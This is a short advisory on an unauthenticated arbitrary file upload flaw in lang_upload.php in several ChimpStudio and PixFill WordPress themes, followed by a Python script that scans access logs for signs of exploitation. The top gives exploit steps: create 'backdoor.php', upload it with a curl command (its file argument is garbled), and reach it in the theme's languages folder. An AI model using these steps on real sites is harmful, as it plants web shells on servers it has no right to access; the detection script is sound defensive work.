Multiple themes from ChimpStudio and PixFill do not have any authorisation or upload validation in the lang_upload.php file, allowing any unauthenticated attacker to upload arbitrary files to the web server.
Create a malicious file "backdoor.php", then run:

curl https://website.com/wp-content/themes/westand/include/lang_upload.php -F "mofile[][email protected]"

The file will be at https://example.com/wp-content/themes/westand/languages/backdoor.php
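To check a site for signs of this issue, the following added example (not part of the original advisory) scans web server access logs for POST requests to a theme's include/lang_upload.php and for requests to script files inside a theme's languages directory. It assumes the combined access log format; the function name scan, the list of executable extensions and the sample log lines are constructed for illustration.

```python
import re

# Combined log format: ip ident user [time] "METHOD path PROTO" status ...
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The upload endpoint and the directory it writes to, for any theme name.
UPLOAD = re.compile(r'^/wp-content/themes/(?P<theme>[^/]+)/include/lang_upload\.php$', re.I)
LANG_FILE = re.compile(r'^/wp-content/themes/(?P<theme>[^/]+)/languages/(?P<name>[^/]+)$', re.I)
# Assumption: extensions the server hands to PHP; adjust to the real handler config.
EXEC_EXT = re.compile(r'\.(php\d?|phtml|phar)$', re.I)

def scan(lines):
    """Return (line_no, finding, theme, client_ip, status) tuples."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format request line
        path = m['path'].split('?', 1)[0]  # ignore the query string
        u = UPLOAD.match(path)
        if u and m['method'] == 'POST':
            findings.append((n, 'upload-endpoint-post', u['theme'], m['ip'], m['status']))
            continue
        f = LANG_FILE.match(path)
        # Translation files are .mo/.po; a script here should never be requested.
        if f and EXEC_EXT.search(f['name']):
            findings.append((n, 'script-in-languages-dir', f['theme'], m['ip'], m['status']))
    return findings

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jan/2024:10:00:01 +0000] "GET /wp-content/themes/westand/languages/en_US.mo HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Jan/2024:10:02:13 +0000] "POST /wp-content/themes/westand/include/lang_upload.php HTTP/1.1" 200 12',
    '203.0.113.9 - - [10/Jan/2024:10:02:20 +0000] "GET /wp-content/themes/westand/languages/backdoor.php?v=1 HTTP/1.1" 200 64',
    '198.51.100.7 - - [10/Jan/2024:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on either finding means the request was served and the theme directory should be inspected on disk; a 404 on the upload endpoint indicates the file is not present.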